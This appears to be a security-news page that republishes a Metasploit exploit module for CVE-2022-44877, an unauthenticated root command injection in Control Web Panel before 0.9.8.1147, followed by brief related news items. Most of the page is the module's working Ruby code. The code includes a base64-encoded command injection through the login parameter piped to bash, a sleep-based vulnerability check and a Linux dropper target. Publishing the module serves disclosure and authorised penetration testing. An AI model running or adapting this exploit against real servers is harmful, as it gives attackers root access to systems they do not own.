Security
Headlines
HeadlinesLatestCVEs

Headline

Control Web Panel Unauthenticated Remote Command Execution

Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.

Packet Storm
#vulnerability#web#linux#git#php#rce#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'CWP login.php Unauthenticated RCE',        'Description' => %q{          Control Web Panel versions < 0.9.8.1147 are vulnerable to          unauthenticated OS command injection. Successful exploitation results          in code execution as the root user. The results of the command are not          contained within the HTTP response and the request will block while          the command is running.        },        'Author' => [          'Spencer McIntyre', # metasploit module          'Numan Türle' # vulnerability discovery        ],        'References' => [          [ 'CVE', '2022-44877' ],          [ 'URL', 'https://github.com/numanturle/CVE-2022-44877' ],          [ 'URL', 'https://control-webpanel.com/changelog#1674073133745-84af1b53-c121' ]        ],        'DisclosureDate' => '2023-01-05',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      Opt::RPORT(2031),      OptString.new('TARGETURI', [true, 'Base path', '/login/index.php'])    ])  end  def check    sleep_time = rand(5..10)    _, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    vprint_status("Elapsed time: #{elapsed_time} seconds")    unless elapsed_time > sleep_time      return CheckCode::Safe('Failed to test command injection.')    end    CheckCode::Appears('Successfully tested command injection.')  rescue Msf::Exploit::Failed    return CheckCode::Safe('Failed to test command injection.')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      if execute_command(payload.encoded)        print_good("Successfully executed command: #{payload.encoded}")      end    when :linux_dropper      execute_cmdstager    end  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path) + "?login=$(echo${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash)",      'vars_post' => {        'username' => 'root', # *must* be root        'password' => rand_text_alphanumeric(4..16),        'commit' => 'Login'      }    )    # the command will either cause the response to timeout or return a 302    return if res.nil?    return if res.code == 302 && res.headers['Location'].include?('login=failed')    fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")  endend

Related news

Alert: Hackers Actively Exploiting Critical "Control Web Panel" RCE Vulnerability

Malicious actors are actively attempting to exploit a recently patched critical vulnerability in Control Web Panel (CWP) that enables elevated privileges and unauthenticated remote code execution (RCE) on susceptible servers. Tracked as CVE-2022-44877 (CVSS score: 9.8), the bug impacts all versions of the software before 0.9.8.1147 and was patched by its maintainers on October 25, 2022. Control

Control Web Panel 7 Remote Code Execution

Control Web Panel 7 versions prior to 0.9.8.1147 suffer from an unauthenticated remote code execution vulnerability.

CVE-2022-44877: # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution